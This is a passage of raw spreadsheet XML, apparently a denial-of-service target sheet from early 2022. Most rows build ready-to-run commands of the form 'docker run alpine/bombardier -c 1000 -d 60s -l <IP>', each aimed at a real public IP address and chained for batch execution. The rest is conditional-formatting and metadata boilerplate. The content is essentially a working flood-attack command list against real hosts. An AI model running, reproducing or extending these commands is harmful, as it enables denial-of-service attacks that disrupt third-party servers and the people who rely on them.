      <c r="A51" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B51&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 88.212.196.71&amp;&amp; sleep 5;</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>82</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="52" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A52" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B52&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.92.118.227&amp;&amp; sleep 5;</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>83</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="53" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A53" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B53&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.177.141.213&amp;&amp; sleep 5;</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>84</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="54" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A54" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B54&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.93.220.68&amp;&amp; sleep 5;</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>85</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="55" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A55" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B55&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.73.232.159&amp;&amp; sleep 5;</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>87</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="56" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A56" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B56&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 75.2.111.214&amp;&amp; sleep 5;</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="57" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A57" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B57&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 75.2.18.233&amp;&amp; sleep 5;</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>88</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="58" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A58" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B58&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.109.15.100&amp;&amp; sleep 5;</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>89</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="59" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A59" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B59&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.50.65.32&amp;&amp; sleep 5;</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="60" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A60" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B60&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 47.240.33.35&amp;&amp; sleep 5;</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>91</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="61" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A61" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B61&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.140.192.170&amp;&amp; sleep 5;</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>92</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="62" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A62" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B62&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.102.136.180&amp;&amp; sleep 5;</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="63" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A63" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B63&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.177.76.70&amp;&amp; sleep 5;</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="64" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A64" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B64&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.196.208&amp;&amp; sleep 5;</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="65" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A65" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B65&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 15.197.142.173&amp;&amp; sleep 5;</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="66" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A66" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B66&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.183.188.59&amp;&amp; sleep 5;</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>94</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="67" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A67" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B67&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.208.1.119&amp;&amp; sleep 5;</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>95</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="68" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A68" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B68&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.52.17&amp;&amp; sleep 5;</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>96</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="69" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A69" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B69&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.214.128.77&amp;&amp; sleep 5;</v>
      </c>
      <c r="B69" s="1" t="s">
        <v>97</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="70" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A70" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B70&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.10&amp;&amp; sleep 5;</v>
      </c>
      <c r="B70" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="71" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A71" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B71&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.36&amp;&amp; sleep 5;</v>
      </c>
      <c r="B71" s="1" t="s">
        <v>99</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="72" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A72" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B72&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.53.177.12&amp;&amp; sleep 5;</v>
      </c>
      <c r="B72" s="1" t="s">
        <v>100</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="73" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A73" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B73&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.32.223&amp;&amp; sleep 5;</v>
      </c>
      <c r="B73" s="1" t="s">
        <v>101</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="74" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A74" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B74&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.17.144&amp;&amp; sleep 5;</v>
      </c>
      <c r="B74" s="1" t="s">
        <v>102</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="75" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A75" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B75&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.216.245.81&amp;&amp; sleep 5;</v>
      </c>
      <c r="B75" s="1" t="s">
        <v>103</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="76" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A76" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B76&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</v>
      </c>
      <c r="B76" s="1" t="s">
        <v>105</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="77" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A77" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B77&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.107&amp;&amp; sleep 5;</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>106</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="78" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A78" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B78&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.70&amp;&amp; sleep 5;</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>107</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="79" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A79" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B79&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.73.24.205&amp;&amp; sleep 5;</v>
      </c>
      <c r="B79" s="1" t="s">
        <v>108</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="80" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A80" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B80&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.205.163&amp;&amp; sleep 5;</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="81" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A81" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B81&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.28.24.244&amp;&amp; sleep 5;</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>110</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="82" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A82" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B82&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 23.111.114.10&amp;&amp; sleep 5;</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>111</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="83" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A83" s="1" t="s">
        <v>1</v>
      </c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</sheetData>
  <conditionalFormatting sqref="B820:B1048576 B1">
    <cfRule type="duplicateValues" dxfId="33" priority="133"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B820:B1048576">
    <cfRule type="duplicateValues" dxfId="32" priority="47"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="31" priority="31"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="30" priority="30"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="29" priority="29"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B820:B1048576 B1 B814">
    <cfRule type="duplicateValues" dxfId="28" priority="27"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="27" priority="165"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814:B1048576 B1">
    <cfRule type="duplicateValues" dxfId="26" priority="14"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B84:B562">
    <cfRule type="duplicateValues" dxfId="22" priority="6"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="21" priority="3"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="20" priority="4"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="19" priority="5"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B3:B82">
    <cfRule type="duplicateValues" dxfId="1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Вад</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-26T20:00:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-19T16:15:27Z</dcterms:modified>
</cp:coreProperties>
</file>